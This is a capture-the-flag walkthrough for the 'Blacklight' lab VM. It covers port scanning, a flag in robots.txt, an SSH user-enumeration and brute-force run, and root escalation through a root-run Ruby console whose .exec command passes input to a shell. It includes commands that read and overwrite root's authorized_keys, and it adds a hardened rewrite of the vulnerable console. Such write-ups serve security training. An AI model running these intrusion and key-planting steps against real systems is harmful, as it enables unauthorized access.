Blacklight - danielcastropalomares/security GitHub Wiki
We start by scanning the target with nmap:
root@kali:~# nmap -A 172.31.255.131
Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-04 12:45 CET
Nmap scan report for 172.31.255.131
Host is up (0.00032s latency).
Not shown: 999 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: BLACKLIGHT
MAC Address: 08:00:27:73:DB:5C (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
TRACEROUTE
HOP RTT ADDRESS
1 0.32 ms 172.31.255.131
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.78 seconds
With nikto we inspect the structure of the web server:
root@kali:~# nikto -host 172.31.255.131
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 172.31.255.131
+ Target Hostname: 172.31.255.131
+ Target Port: 80
+ Start Time: 2018-11-04 12:46:29 (GMT1)
---------------------------------------------------------------------------
+ Server: Apache/2.4.29 (Ubuntu)
+ Server leaks inodes via ETags, header found with file /, fields: 0x6df 0x56e163c2e4a62
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Allowed HTTP Methods: GET, POST, OPTIONS, HEAD
+ OSVDB-3268: /img/: Directory indexing found.
+ OSVDB-3092: /img/: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7535 requests: 0 error(s) and 8 item(s) reported on remote host
+ End Time: 2018-11-04 12:46:39 (GMT1) (10 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
*********************************************************************
Portions of the server's headers (Apache/2.4.29) are not in
the Nikto database or are newer than the known string. Would you like
to submit this information (*no server specific data*) to CIRT.net
for a Nikto update (or you may email to [email protected]) (y/n)? n
Running nmap with the vuln script category reveals more directories:
root@kali:~# nmap -Pn --script vuln 172.31.255.131
Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-04 12:49 CET
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Nmap scan report for 172.31.255.131
Host is up (0.00023s latency).
Not shown: 999 closed ports
PORT STATE SERVICE
80/tcp open http
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
| /robots.txt: Robots file
| /css/: Potentially interesting directory w/ listing on 'apache/2.4.29 (ubuntu)'
| /img/: Potentially interesting directory w/ listing on 'apache/2.4.29 (ubuntu)'
|_ /js/: Potentially interesting directory w/ listing on 'apache/2.4.29 (ubuntu)'
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
MAC Address: 08:00:27:73:DB:5C (Oracle VirtualBox virtual NIC)
The robots file contains the following:
http://172.31.255.131/robots.txt
User-agent: *
flag1.txt
blacklight.dict
It points us to the first flag:
http://172.31.255.131/flag1.txt
{flag1:fc4c7223964a26b152823d14f129687207e7fe15}
9072. The secret is at home.
The flag hints at a port, so we scan all ports this time:
root@kali:~# nmap -p- 172.31.255.131
Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-04 13:06 CET
Nmap scan report for 172.31.255.131
Host is up (0.00020s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE
80/tcp open http
9072/tcp open unknown
MAC Address: 08:00:27:73:DB:5C (Oracle VirtualBox virtual NIC)
Port 9072 is open, which matches the number in the flag1.txt we found earlier. Connecting to it with telnet shows a menu:
root@kali:~# telnet 172.31.255.131 9072
Trying 172.31.255.131...
Connected to 172.31.255.131.
Escape character is '^]'.
BLACKLIGHT console mk1. Type .help for instructions
.help
.readhash - Get one step closer
.exec <cmd> - Execute commands
.quit - Exit the server
.readhash
b5f4723bd6df85b54b0905bd6d734be9ef1cc1eb977413a932a828b5c52ef5a6
We try to bring up the SSH server through the .exec command:
.exec /etc/init.d/ssh start
A telnet connection to port 22 now gets a reply:
root@kali:~# telnet 172.31.255.131 22
Trying 172.31.255.131...
Connected to 172.31.255.131.
Escape character is '^]'.
SSH-2.0-OpenSSH_7.6p1 Ubuntu-4
This OpenSSH version is vulnerable to username enumeration, so we try to enumerate users:
msf auxiliary(scanner/ssh/ssh_enumusers) > use auxiliary/scanner/ssh/ssh_enumusers
msf auxiliary(scanner/ssh/ssh_enumusers) > set USERNAME root
USERNAME => root
msf auxiliary(scanner/ssh/ssh_enumusers) > exploit
[*] 172.31.255.131:22 - SSH - Using malformed packet technique
[*] 172.31.255.131:22 - SSH - Starting scan
[+] 172.31.255.131:22 - SSH - User 'root' found
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Since the VM is called blacklight, we try that name as a user as well:
msf auxiliary(scanner/ssh/ssh_enumusers) > set USERNAME blacklight
USERNAME => blacklight
msf auxiliary(scanner/ssh/ssh_enumusers) > exploit
[*] 172.31.255.131:22 - SSH - Using malformed packet technique
[*] 172.31.255.131:22 - SSH - Starting scan
[+] 172.31.255.131:22 - SSH - User 'blacklight' found
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Now, using the dictionary we found earlier on the web server, we run nmap with the ssh-brute script. The users.lst file contains only the user "blacklight":
nmap --script=ssh-brute --script-args userdb=users.lst,passdb=blacklight.dict 172.31.255.131
Bingo, it finds a match:
22/tcp open ssh
| ssh-brute:
| Accounts:
| blacklight:iambl - Valid credentials
The first thing we check after logging in are the user's groups:
blacklight@blacklight:~$ id
uid=1000(blacklight) gid=1004(blacklight) groups=1004(blacklight),4(adm),24(cdrom),30(dip),46(plugdev),108(lxd),1000(lpadmin),1001(sambashare),1002(debian-tor),1003(libvirtd)
The user is not in the sudo group:
blacklight@blacklight:~$ sudo -l
[sudo] password for blacklight:
Sorry, user blacklight may not run sudo on blacklight.
The console script is running as root, so we are going to take advantage of that:
blacklight@blacklight:~$ ps aux | grep console
root 734 0.0 0.0 4628 816 ? Ss 21:28 0:00 /bin/sh -c /bin/ruby /home/blacklight/console.rb
root 735 0.0 0.9 47536 9084 ? Sl 21:28 0:00 /bin/ruby /home/blacklight/console.rb
First of all we remove the counters from the script so that we can run as many commands as we want (by default the shell closed after more than two commands had been entered). This is the relevant part of console.rb:
# .readhash: sends the hash file to the client and counts the command
if line == '.readhash'
  connection.puts File.read('/home/blacklight/hash.txt')
  counter += 1
end
# .exec: everything after the first word is joined and passed to a shell
# (note the unescaped dot in the regex, which matches any character)
if line =~ /.exec/
  cmd = line.split(" ")[1..line.length - 1].join(' ')
  system(cmd)
  counter += 1
end
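The weakness in console.rb is that a root-owned service hands whatever follows .exec to a shell. The following hardened dispatcher is an added example written for this writeup, not the VM's own console.rb: it keeps the same .help/.readhash/.exec/.quit interface and the two-command limit, but only runs fixed argv vectors from an allowlist and never invokes a shell. The hash path and the allowed commands are assumptions for the example; the service itself should also run as an unprivileged user (for instance via a systemd User= directive) rather than as root.

```ruby
require 'open3'

HASH_PATH    = '/home/blacklight/hash.txt' # assumed path, taken from the page
MAX_COMMANDS = 2                           # the two-command limit of the original console

# Fixed argv vectors. User input only selects a key; it never reaches a shell.
ALLOWED = {
  'date'   => ['date', '-u'],
  'uptime' => ['uptime'],
}.freeze

class ConsoleSession
  attr_reader :counter

  def initialize(hash_path: HASH_PATH)
    @hash_path = hash_path
    @counter   = 0
  end

  # Returns the reply for one input line, or nil when the session must close.
  def handle(line)
    return nil if @counter >= MAX_COMMANDS
    line = line.to_s.strip
    case line
    when '.help'
      '.readhash | .exec <name> | .quit'
    when '.quit'
      nil
    when '.readhash'
      @counter += 1
      File.exist?(@hash_path) ? File.read(@hash_path).strip : 'hash unavailable'
    when /\A\.exec (\S+)\z/            # anchored: exactly one bare command name
      argv = ALLOWED[$1]
      return "rejected: #{$1} is not an allowed command" unless argv
      @counter += 1
      begin
        out, status = Open3.capture2e(*argv)   # argv form, no shell interpretation
        status.success? ? out.strip : "command failed (#{status.exitstatus})"
      rescue Errno::ENOENT
        'command not found'
      end
    else
      'unknown command; type .help'
    end
  end
end
```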
Now we reboot the machine and start SSH again as before. Then we check whether the root user has any keys in its authorized_keys:
.exec cat /root/.ssh/authorized_keys > /tmp/result
blacklight@blacklight:~$ cat /tmp/result
It is empty, since nothing comes back, so we copy our own key (which we had previously uploaded for the blacklight user):
.exec cat /home/blacklight/.ssh/authorized_keys > /root/.ssh/authorized_keys
Logging in over SSH now gives us a root shell:
root@kali:~# ssh root@172.31.255.131
___. .__ __ .__ .__ .__ __
\_ |__ | | _____ ____ | | _| | |__| ____ | |___/ |_
| __ \ | | \__ \ _/ ___\| |/ / | | |/ ___\| | \ __\
| \_\ \| |__/ __ \ \___ | <| |_| / /_/ > Y \ |
|___ /|____(____ /\___ >__|_ \____/__\___ /|___| /__|
\/ \/ \/ \/ /_____/ \/
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
root@blacklight:~#